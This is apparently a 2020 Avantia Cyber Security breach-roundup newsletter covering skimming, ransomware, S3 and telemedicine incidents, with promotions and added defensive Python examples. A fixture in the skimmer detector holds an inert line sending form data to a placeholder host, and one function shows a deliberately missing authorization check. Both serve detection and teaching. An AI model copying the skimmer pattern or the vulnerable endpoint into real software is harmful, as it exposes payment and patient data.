
Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SMEs to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote-access, independent, ‘real time’ audit of our clients’ critical operational infrastructure systems to determine where the gaps are, with recommendations for remediation.

It’s the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit:


Exploit: Internal Email Account Compromise 

AMT Healthcare: Medical Care Solutions Provider 

Risk to Small Business: 1.662 = Severe - AMT Healthcare revealed this week that it had experienced a data breach affecting a large pool of customers in December 2019 that was discovered through suspicious activity on an employee email account. The California-based company recently completed an investigation into the incident and contacted those who were affected. Potentially compromised data includes patient names, Social Security numbers, medical record numbers, diagnosis information, health insurance policy information, medical history information, and driver’s license/state identification numbers.

Individual Risk: 1.899 = Severe - Anyone who may be at risk of compromise was informed this week. Extremely sensitive data was compromised in this breach, and those affected should beware of the fraud, identity theft, and spear phishing attempts that this stolen data makes possible. A filing posted to the breach portal at the U.S. Department of Health and Human Services noted that potentially affected patients are being offered free credit monitoring services.

Customers Impacted: 47,767

Effect On Customers: When clients choose to do sensitive business with a company, they’re also trusting that company to guard their information. This imperative is even stronger for companies that collect health information. Not only does a data breach cost healthcare organizations patient confidence, but it also costs a fortune in HIPAA-related fines.

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk; 1.51 – 2.49 = Severe Risk; 2.5 – 3 = Moderate Risk. Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID uses human and machine intelligence to watch the Dark Web 24/7/365. We scour every corner for leaked passwords, compromised credentials, or sensitive data that could create a data breach risk for Avantia’s Customers and alert them in real time when they appear. Book a FREE demo by calling Avantia on 07 30109711

THREAT FOCUS: CentralSquare Technologies - UNITED STATES

Exploit: Malware 

CentralSquare Technologies: Public Sector Services Provider

Risk to Small Business: 1.977 = Severe - Eight cities in three U.S. states that use CentralSquare’s Click2Gov payment systems for municipal transactions were recently affected by a payment card skimming attack that exploited a software vulnerability in the Click2Gov platform. Using Magecart-style malware designed specifically to work on Click2Gov payment sites, cybercriminals were able to capture payment card information from people using the affected Click2Gov sites to make municipal services transactions such as paying bills or fines. The attacks began in April 2020 and are ongoing. Reports note that 5 of the 8 cities affected were also targeted in attacks in 2019. The names of the affected cities were not released.

Individual Risk: 2.378 = Severe - Financial data was directly compromised in this attack, including payment card numbers, expiration dates, and CVV. Similar information from previous attacks against Click2Gov in 2019 and 2018 was made available on the Dark Web quickly. 

Customers Impacted: Unknown

Effect On Customers: Payment skimming malware is an increasing threat for any business that processes online payments. Compromised financial and identity information can also hang around in Dark Web markets for a long time, creating continued risk.  
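A Magecart-style skimmer works by getting attacker-controlled JavaScript onto the checkout page, either as an extra external script or as an injected inline block, so one practical check for any site that takes card payments is to baseline the scripts on the payment page and alert on anything new. The following is an added example, not code from CentralSquare, Click2Gov or the reporting above; the page fragments, the host names (payments.example.com, cdn.example-stats.net) and the inert skimmer stand-in are all constructed for the demonstration.

```python
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ScriptCollector(HTMLParser):
    """Collect external <script src> URLs and inline <script> bodies from an HTML page."""

    def __init__(self):
        super().__init__()
        self.external = []   # values of src= attributes
        self.inline = []     # text of inline script blocks
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.external.append(src)
        else:
            self._in_script, self._buf = True, []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag.lower() == "script" and self._in_script:
            self._in_script = False
            self.inline.append("".join(self._buf).strip())


def fingerprint(html):
    """Return (set of external script hosts, set of sha256 hashes of inline scripts)."""
    p = _ScriptCollector()
    p.feed(html)
    p.close()
    hosts = {urlparse(s).netloc for s in p.external}
    hosts.discard("")  # relative paths such as /static/app.js are same-origin
    hashes = {hashlib.sha256(s.encode()).hexdigest() for s in p.inline}
    return hosts, hashes


def baseline_from(html):
    """Fingerprint a known-good copy of the page to use as the allowlist."""
    hosts, hashes = fingerprint(html)
    return sorted(hosts), sorted(hashes)


def find_skimmer_indicators(html, allowed_hosts, known_inline_hashes):
    """Report external hosts and inline scripts that were not in the baseline.

    SRI hashes or a strict CSP would block these at load time; this is the
    monitoring side, for pages whose scripts you do not fully control.
    """
    hosts, hashes = fingerprint(html)
    findings = [f"unexpected external script host: {h}"
                for h in sorted(hosts - set(allowed_hosts))]
    findings += [f"inline script not in baseline (sha256 {h[:16]}...)"
                 for h in sorted(hashes - set(known_inline_hashes))]
    return findings


# Constructed sample pages (not real Click2Gov markup).
BASELINE_PAGE = """<html><body>
<script src="https://payments.example.com/sdk.js"></script>
<script src="/static/checkout.js"></script>
<script>window.cfg = {"gateway": "/api/pay"};</script>
<form id="pay"><input name="card"><input name="cvv"></form>
</body></html>"""

# The same page after a Magecart-style injection: one new third-party script and
# one new inline block. The inline body is an inert stand-in, not a working skimmer.
SKIMMER_INJECTION = (
    '<script src="https://cdn.example-stats.net/analytics.js"></script>\n'
    '<script>/* constructed stand-in */ hookForm("pay", "https://cdn.example-stats.net/c");</script>\n'
)
TAMPERED_PAGE = BASELINE_PAGE.replace("</body>", SKIMMER_INJECTION + "</body>")


def run_demo():
    """Baseline the clean page, then scan the tampered copy."""
    allowed_hosts, known_hashes = baseline_from(BASELINE_PAGE)
    return find_skimmer_indicators(TAMPERED_PAGE, allowed_hosts, known_hashes)


if __name__ == "__main__":
    for line in run_demo():
        print(line)
```

In practice the baseline is refreshed only through the release process, the fetch runs on a schedule from outside the network (skimmers are often served selectively), and a finding is treated as an incident, not a ticket, because the cards are being stolen while the alert is open.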

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk; 1.51 – 2.49 = Severe Risk; 2.5 – 3 = Moderate Risk. Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID uses human and machine intelligence to watch the Dark Web 24/7/365. We scour every corner for leaked passwords, compromised credentials, or sensitive data that could create a data breach risk for Avantia’s Customers and alert them in real time when they appear. Book a FREE demo by calling Avantia on 07 30109711

THREAT FOCUS: University of California San Francisco - UNITED STATES

Exploit: Ransomware 

University of California San Francisco: Education and Research Institution 

Risk to Small Business: 1.275 = Extreme - The University of California San Francisco (UCSF) confirmed this week that it paid cybercriminals $1.14 million to decrypt data following a ransomware attack. Although UCSF was able to detect the incident quickly, it was not fast enough to allow cybersecurity teams to quarantine the affected servers, and a significant portion of its medical school and research data was encrypted. The ransom was demanded to free essential COVID-19 research data that was captured in an intrusion on June 1. Reports indicate that UCSF was one of four academic institutions targeted in a single week by the Netwalker ransomware group.  

Individual Risk: No patient or personal data was reported as compromised at this time. 

Customers Impacted: Unknown

Effect On Customers: Ransomware is a growing menace to every organization, and it’s not just sensitive business or financial data that Dark Web criminals are after. Research data has become an increasingly hot commodity. Paying ransoms to cybercriminals to decrypt research data sets a dangerous precedent. Collecting large sums will embolden other groups that can take down big fish to score big paydays.  

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk; 1.51 – 2.49 = Severe Risk; 2.5 – 3 = Moderate Risk. Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID uses human and machine intelligence to watch the Dark Web 24/7/365. We scour every corner for leaked passwords, compromised credentials, or sensitive data that could create a data breach risk for Avantia’s Customers and alert them in real time when they appear. Book a FREE demo by calling Avantia on 07 30109711

THREAT FOCUS: OneClass Learning - CANADA

Exploit: Unsecured Database Access 

OneClass: E-learning Platform 

Risk to Small Business: 1.407 = Extreme - An unsecured Amazon Simple Storage Service (S3) bucket is the culprit for a data breach at North American education services provider OneClass. The Canadian company was informed of the exposure on May 25 by cybersecurity researchers and the bucket was secured within 24 hours. However, personally identifiable information for more than 1 million students, some as young as 13, had already been extracted. The compromised 27GB database includes 8.9 million records.

Individual Risk: 1.719 = Severe - Students, teachers, and other users of the platform had personally identifiable data including full names, email addresses (some masked), schools and universities attended, phone numbers, course enrollment data, textbooks, testing results, faculty data, and other OneClass account details compromised. No payment information or financial data is believed to have been affected.  

Customers Impacted: 1 million

Effect On Customers: Failure to secure the personally identifiable data of users, especially children, is distasteful to both potential and current clients. Students, teachers, and schools may look at other education platforms to find a more secure alternative. Information compromised in this incident could haunt those affected for years to come as it lingers on the Dark Web. 
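The OneClass exposure is the classic unsecured-bucket case: data readable by anyone who learns the bucket name. Whether an S3 bucket is public is decided by three settings together, the bucket policy, the bucket ACL and the Block Public Access configuration, and a review that looks at only one of them misses exposures. The following is an added example of evaluating those three inputs offline; it is not OneClass’s configuration or an AWS tool, and the bucket name, policy, ACL and Block Public Access documents are constructed in the shape the S3 API returns them (GetBucketPolicy, GetBucketAcl, GetPublicAccessBlock).

```python
import json

# The two ACL grantee groups that mean "everyone" and "any AWS account holder".
PUBLIC_ACL_GROUPS = {
    "http://acs.amazonaws.com/groups/global/AllUsers",
    "http://acs.amazonaws.com/groups/global/AuthenticatedUsers",
}


def _principal_is_everyone(principal):
    """Principal may be "*", {"AWS": "*"} or {"AWS": ["*", ...]}."""
    if principal == "*":
        return True
    if isinstance(principal, dict):
        aws = principal.get("AWS", [])
        return "*" in ([aws] if isinstance(aws, str) else aws)
    return False


def public_policy_statements(policy):
    """Sids of Allow statements whose principal is everyone.

    A statement with a Condition (e.g. aws:SourceVpc) may still be safe, so it
    is reported but tagged rather than silently accepted.
    """
    hits = []
    for i, st in enumerate(policy.get("Statement", [])):
        if st.get("Effect") != "Allow" or not _principal_is_everyone(st.get("Principal")):
            continue
        sid = st.get("Sid", f"Statement[{i}]")
        hits.append(sid + (" (conditional)" if "Condition" in st else ""))
    return hits


def public_acl_grants(acl):
    """Permissions granted to AllUsers/AuthenticatedUsers in the bucket ACL."""
    hits = []
    for g in acl.get("Grants", []):
        grantee = g.get("Grantee", {})
        if grantee.get("Type") == "Group" and grantee.get("URI") in PUBLIC_ACL_GROUPS:
            hits.append(f"{grantee['URI'].rsplit('/', 1)[-1]}:{g.get('Permission')}")
    return hits


def assess_bucket(name, policy, acl, public_access_block):
    """Decide whether the bucket is reachable by the public and say why.

    Block Public Access overrides the other two: IgnorePublicAcls makes public
    ACL grants inert, RestrictPublicBuckets does the same for a public policy.
    """
    pab = public_access_block or {}
    reasons = []
    acl_hits = public_acl_grants(acl)
    if acl_hits and not pab.get("IgnorePublicAcls", False):
        reasons.append(f"ACL grants {', '.join(acl_hits)}")
    policy_hits = public_policy_statements(policy)
    if policy_hits and not pab.get("RestrictPublicBuckets", False):
        reasons.append(f"policy allows everyone in {', '.join(policy_hits)}")
    return {"bucket": name, "public": bool(reasons), "reasons": reasons}


# Constructed inputs (bucket name, account id and policies are illustrative only).
EXPOSED_POLICY = json.loads("""{
  "Version": "2012-10-17",
  "Statement": [
    {"Sid": "PublicRead", "Effect": "Allow", "Principal": "*",
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::student-exports/*"}
  ]
}""")
EXPOSED_ACL = {"Grants": [
    {"Grantee": {"Type": "CanonicalUser", "ID": "owner"}, "Permission": "FULL_CONTROL"},
    {"Grantee": {"Type": "Group", "URI": "http://acs.amazonaws.com/groups/global/AllUsers"},
     "Permission": "READ"},
]}
PAB_OFF = {k: False for k in ("BlockPublicAcls", "IgnorePublicAcls",
                              "BlockPublicPolicy", "RestrictPublicBuckets")}
PAB_ON = {k: True for k in PAB_OFF}

# The hardened form: access only through a named role, owner-only ACL, Block Public Access on.
HARDENED_POLICY = {"Version": "2012-10-17", "Statement": [
    {"Sid": "AppRoleRead", "Effect": "Allow",
     "Principal": {"AWS": "arn:aws:iam::123456789012:role/app-reader"},
     "Action": "s3:GetObject", "Resource": "arn:aws:s3:::student-exports/*"}
]}
HARDENED_ACL = {"Grants": [EXPOSED_ACL["Grants"][0]]}


if __name__ == "__main__":
    print(assess_bucket("student-exports", EXPOSED_POLICY, EXPOSED_ACL, PAB_OFF))
    print(assess_bucket("student-exports", HARDENED_POLICY, HARDENED_ACL, PAB_ON))
```

Two caveats for real use: the account-level Block Public Access setting also applies and should be merged with the bucket-level one before calling `assess_bucket`, and individual object ACLs can grant public read even when the bucket-level inputs are clean, so an inventory of object ACLs (or simply enabling bucket-owner-enforced object ownership) closes that gap.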

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk; 1.51 – 2.49 = Severe Risk; 2.5 – 3 = Moderate Risk. Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID uses human and machine intelligence to watch the Dark Web 24/7/365. We scour every corner for leaked passwords, compromised credentials, or sensitive data that could create a data breach risk for Avantia’s Customers and alert them in real time when they appear. Book a FREE demo by calling Avantia on 07 30109711


THREAT FOCUS: Babylon Health - UNITED KINGDOM

Exploit: Accidental Data Sharing

Babylon Health: Telemedicine Technology Developer 

Risk to Small Business: 2.207 = Severe - A recently completed investigation revealed that a flaw in the software created by Babylon Health to enable telemedicine appointments also allowed users to see the consultations of other patients after they finished their own telemedicine visits. The app is used by about 2.3 million UK users. It allows members to book medical appointments, access a triage chatbot, and have consultations with NHS doctors via smartphone video or audio-only call. When users switched from video to audio-only during their call, they also gained access to the audio recordings of other users’ medical consultations.

Individual Risk: 2.919 = Moderate - Babylon Health reports that the issue was discovered in early June and repaired rapidly, with a “very small” unspecified number of users affected. 

Customers Impacted: Unknown

Effect On Customers: More and more interactions are taking place over video these days, especially in the wake of the global pandemic. Many video conferencing service providers have had issues with intrusions and software glitches that put the private conversations and meetings of users at risk, creating doubt in the security of this type of communication. Because of this, data that is shared during a video conference through display, audio, or screen sharing may be in danger of compromise.
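Babylon has not published the root cause, so the code below does not reproduce its bug. It is an added example of the class of defect the description points at: a recording endpoint that looks records up by identifier without confirming the caller was a participant in that consultation, shown in a vulnerable and a hardened form. The in-memory store, the user and recording identifiers and the `AccessDenied` type are constructed for the illustration and are not Babylon’s code.

```python
from dataclasses import dataclass


class AccessDenied(Exception):
    """Raised for both 'not found' and 'not yours' so ids cannot be enumerated."""


@dataclass(frozen=True)
class Recording:
    recording_id: str
    participants: frozenset   # user ids allowed to hear this consultation
    audio: bytes


# Constructed store: two consultations, each between one patient and one clinician.
RECORDINGS = {
    "rec-1001": Recording("rec-1001", frozenset({"patient-a", "dr-smith"}), b"audio-a"),
    "rec-1002": Recording("rec-1002", frozenset({"patient-b", "dr-jones"}), b"audio-b"),
}
# Server-side index of each user's most recent consultation.
LATEST = {"patient-a": "rec-1001", "patient-b": "rec-1002"}


def get_recording_vulnerable(session_user, recording_id):
    """Vulnerable: the session is authenticated, but the object is never authorized.

    Any logged-in user who ends up with someone else's id (leaked, guessed, or
    handed over by a client bug such as a stale id after switching call modes)
    receives that person's audio.
    """
    return RECORDINGS[recording_id].audio


def get_recording_hardened(session_user, recording_id):
    """Hardened: object-level authorization on every fetch, one error for both failures."""
    rec = RECORDINGS.get(recording_id)
    if rec is None or session_user not in rec.participants:
        raise AccessDenied(f"{session_user} cannot access {recording_id}")
    return rec.audio


def latest_recording_for(session_user):
    """Resolve 'my latest recording' on the server so the client never supplies an id."""
    rid = LATEST.get(session_user)
    if rid is None:
        raise AccessDenied(f"{session_user} has no recordings")
    return get_recording_hardened(session_user, rid)


if __name__ == "__main__":
    print(get_recording_vulnerable("patient-a", "rec-1002"))   # another patient's audio
    try:
        get_recording_hardened("patient-a", "rec-1002")
    except AccessDenied as e:
        print("denied:", e)
```

The two design points worth copying are that the authorization check lives in the data access function rather than in whichever UI path happens to call it, so a client-side mode switch cannot route around it, and that the server derives “the caller’s own recording” itself instead of trusting an identifier the client sends back.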

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk; 1.51 – 2.49 = Severe Risk; 2.5 – 3 = Moderate Risk. Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & Huntsman Digital Auditor to the Rescue: Helping SMEs to understand the importance of security is no easy task. With an ‘Essential8’ Digital Security Audit we offer a remote-access, independent, ‘real time’ audit of our clients’ critical operational infrastructure systems to determine where the gaps are, with recommendations for remediation.

It’s the first step to real cyber security. Call Avantia’s office on 07 30109711 or visit:

THREAT FOCUS: Chem Pack Formulations - AUSTRALIA

Exploit: Ransomware

Chem Pack: Liquid Chemical Formulation Manufacturer 

Risk to Small Business: 1.779 = Severe - As a barrage of cyberattacks continues to affect companies in Australia, Chem Pack has been caught in a ransomware attack. Cybercriminals using REvil ransomware have compromised and encrypted data at the Melbourne-based manufacturer. REvil exploits a known 2018 Windows vulnerability to elevate privileges on a compromised host, giving its operators the access they need to deploy the ransomware. The attackers claim to have exfiltrated financial information, personal information, and other essential business data, and recently posted a screenshot of a sample of the data on a Dark Web forum. Typically, this group posts such a screenshot as proof that it holds the stolen data and asks the victim to make contact to negotiate a ransom for the decryption key.

Individual Risk: No individual data was reported as compromised.

Customers Impacted: Unknown

Effect On Customers: Ransomware is a scourge that doesn’t just hold a company’s operations hostage; it also creates extended cybersecurity risk as data obtained in attacks is copied and shared on the Dark Web. Even when a ransom is paid, victims have no guarantee that the captured data is returned without being replicated or sold to others first.

Cybersecurity Risk Levels

1 – 1.5 = Extreme Risk; 1.51 – 2.49 = Severe Risk; 2.5 – 3 = Moderate Risk. Risk scores are calculated using a formula that considers a wide range of factors related to the assessed breach.

Avantia Cyber Security & ID Agent to the Rescue: Dark Web ID uses human and machine intelligence to watch the Dark Web 24/7/365. We scour every corner for leaked passwords, compromised credentials, or sensitive data that could create a data breach risk for Avantia’s Customers and alert them in real time when they appear. Book a FREE demo by calling Avantia on 07 30109711



Australian Cyberattacks Prove That Threat Resistance Training is Always a Good Investment 

Sophisticated cyberattack risks are growing throughout the world, and the attacker isn’t always an opportunistic criminal group. A recent surge of cyberattacks against targets in Australia has been reported to be linked to a state-sponsored actor, creating a new level of concern for cybersecurity architects.

Ransomware has become an even greater menace for Australian companies. Government officials have warned that ransomware delivered through spear phishing is suspected to be part of the larger picture in this wave of attacks. Frequent, high-quality phishing defense and resistance training is therefore essential to protect a company from ransomware.

Ransomware is devastating to any business, as two incidents at Australian drinks conglomerate Lion recently demonstrated. Systems at the beverage company have been infected twice in the last month alone, freezing essential production and operations technology just as it began to ramp up post-pandemic production.

Get tips to help secure a remote workforce fast, and insight into the unexpected risks that remote operations bring, in our Remote Working Cybersecurity resource package.

A dynamic solution like BullPhish ID is the right choice for state-of-the-art phishing resistance training. BullPhish ID’s constantly updated educational tools let staff learn through video and be tested on that knowledge with online quizzes, with pre-made phishing simulation kits covering the latest threats available in 8 languages for quick deployment. These features also make it an ideal vehicle for remote training, because training shouldn’t stop just because staff aren’t in the office.

Updating a company’s cybersecurity stack to boost ransomware defense should always include upgrading phishing resistance training.
Dark Web monitoring is a great place to start when constructing a strong cybersecurity defense, but every building block in that defense is important – and improved phishing resistance with BullPhish ID is an easy and affordable block to add.

An Ounce of Prevention is Worth a Pound of Cure 

We’ve all heard this old saw, and it’s still popular for a reason: it’s right. Taking strong preventative measures now to protect your data saves both time and money later. More than 50% of businesses had a data breach in 2020, and a breach is a time-consuming money pit for any company. By taking the right preventative measures now, you lower your risk of a breach later.

One of the most important preventative measures to take right away is updated training about current phishing threats. Cybercriminals are using many new tricks to mount phishing attacks. Your staff may know not to open unexpected attachments, but do they know not to click surprise links, open unanticipated PDFs, or accept unverified Zoom invitations? Updated phishing training prepares them to resist these threats and protect your data.

Coupling phishing resistance training with 24/7/365 Dark Web monitoring guards your data on two fronts. Improved phishing resistance stops bad actors from getting a front-door key to your data, and watching for Dark Web threats makes sure that cybercriminals aren’t sneaking in the back door with credentials that have already leaked. Combining solutions that work well together maximizes the ways your security stack helps prevent data loss, because strong, sensible preventative measures always pay off.



Many cybersecurity incidents today are the result of internal security issues that no firewall or anti-virus could have prevented. Cyber Hawk combines machine learning and intelligent tagging to identify anomalous activity, suspicious changes, and threats caused by misconfigurations. It is installed remotely on your Windows-based endpoints (desktops, laptops, tablets) and keeps you informed of potential internal security issues inside your network. Set the time for the daily scan and Cyber Hawk reports back with an email alert sent to any address you specify. The daily alert aggregates the issues detected during the past 24 hours and can be sorted either by priority/severity (high, medium and low) or by the type of issue (threat, anomaly, change).




Avantia Corporate Services Pty Ltd T/A Avantia Cyber Security provides the content in this publication to the reader for general information purposes only and has compiled the content from a number of sources in Australia, the USA, other members of the 5 Eyes Alliance, the Australian Cyber Security Centre, and other sources in 56 countries who provide cyber breach and cyber security information to us in real time. Given their international focus and experience in the cyberspace arena we believe their data to be accurate and reliable; however, we give no warranty (implied or otherwise) as to the content’s accuracy or fitness for use. No validation or investigation has been performed by Avantia Corporate Services or the Author as to its accuracy or reliability. Readers should conduct their own investigation and come to their own conclusions before taking any action.

*COPYRIGHT 2020* Avantia Corporate Services - All Rights Reserved.